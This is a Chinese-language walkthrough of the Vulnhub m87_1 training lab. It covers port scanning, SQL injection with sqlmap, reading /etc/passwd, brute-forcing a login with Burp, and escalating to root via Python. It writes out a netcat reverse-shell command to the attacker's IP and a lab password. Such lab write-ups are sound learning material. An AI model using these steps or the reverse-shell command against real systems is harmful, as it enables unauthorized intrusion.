Vulnhub靶机m87_1渗透

34 阅读2分钟

靶机介绍 官方下载地址:www.vulnhub.com/entry/m87-1… 靶机难度容易,拥有两个用户,网络适配器是NAT模式自动分配IP地址 在这里插入图片描述 运行环境 靶机:网络设为NAT,IP地址:192.168.174.138 攻击机:同网段下的kali linux,IP地址:192.168.174.135 开始渗透 运行靶机 在这里插入图片描述 靶机运行之后就提示了IP地址,端口和一个域名 扫一下端口看是否有其他存在 在这里插入图片描述 在这里插入图片描述 在这里插入图片描述 扫一下80端口的目录 在这里插入图片描述 开始访问得到的这些目录 80端口的首页 在这里插入图片描述 admin 在这里插入图片描述 /admin/backup/ 在这里插入图片描述 9090端口首页 在这里插入图片描述 找到了四个登录页面 http://192.168.174.138/admin/ 输入参数id=' 出现报错 id=1的时候回显正常 说明存在注入点 在这里插入图片描述 使用sqlmap跑一下,确实存在注入点 在这里插入图片描述 在db的数据库的users表当中找到了用户名密码 在这里插入图片描述 经过多次尝试这里的用户名密码是无法登录任何一个登录页面 但是数据库存在flie权限,可以读取文件 在这里插入图片描述 在这里插入图片描述 查看passwd 在这里插入图片描述 在这里插入图片描述 这里看到确实只存在两个用户 接下就不知道怎么办了,最后看了某一位大佬的视频才做出来的,将所有用户和密码收集起来使用burp进行爆破, 最后使用charlotte:15The4Dm1n4L1f3登录9090端口的首页 在这里插入图片描述 在这里插入图片描述 在终端选项里面发现可以执行系统命令,接下来就是提权了,有好几个方法可以提权 在这里插入图片描述 第一个方法: 执行命令反弹shell到本地 nc -e /bin/bash 192.168.174.135 4444 在这里插入图片描述 在这里插入图片描述 使用python打开一个终端 在这里插入图片描述 查看old发现是python2.7可以利用os模块调用本地的root的shell 在这里插入图片描述 在这里插入图片描述 第二个方法: 利用python相关的提权命令进行提权 在这里插入图片描述 在这里插入图片描述 也可以不反弹shell到本地直接在浏览器执行提权命令 在这里插入图片描述 在这里插入图片描述 这个靶机到这里就渗透结束了,难点在于获取用户名和密码